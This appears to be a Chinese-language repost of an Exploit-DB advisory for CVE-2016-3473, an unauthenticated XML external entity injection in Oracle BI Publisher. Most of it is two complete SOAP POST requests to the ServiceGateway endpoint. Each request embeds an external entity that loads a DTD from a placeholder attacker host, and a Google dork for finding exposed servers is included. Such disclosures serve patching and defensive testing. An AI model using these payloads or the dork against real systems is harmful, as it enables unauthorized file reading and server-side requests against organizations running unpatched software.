Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 – XML External Entity Injection

  • 作者: Jakub Palaczynski
    日期: 2016-10-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40590/
  • # Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
    # Date: 20\10\2016
    # Exploit Author: Jakub Palaczynski
    # CVE : CVE-2016-3473
    # Vendor Homepage: https://www.oracle.com/
    # Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
    # Info: Previous versions may also be vulnerable.
    # Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"
    
    1. Vulnerable SOAP Action: replyToXML
    
    POST /xmlpserver/services/ServiceGateway HTTP/1.1
    Content-Type: text/xml;charset=UTF-8
    SOAPAction: #replyToXML
    Host: vulnerablehost
    Content-Length: 630
    
    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
     <soapenv:Header/>
     <soapenv:Body>
    <ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
     <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
    </ser:replyToXML>
     </soapenv:Body>
    </soapenv:Envelope>
    
    ------------------------------------------------
    
    2. Vulnerable SOAP Action: replyToXMLWithContext
    
    POST /xmlpserver/services/ServiceGateway HTTP/1.1
    
    Content-Type: text/xml;charset=UTF-8
    
    SOAPAction: #replyToXMLWithContext
    
    Host: vulnerablehost
    
    Content-Length: 646
    
    
    
    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
    
     <soapenv:Header/>
    
     <soapenv:Body>
    
    <ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    
     <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
    
    </ser:replyToXMLWithContext>
    
     </soapenv:Body>
    
    </soapenv:Envelope>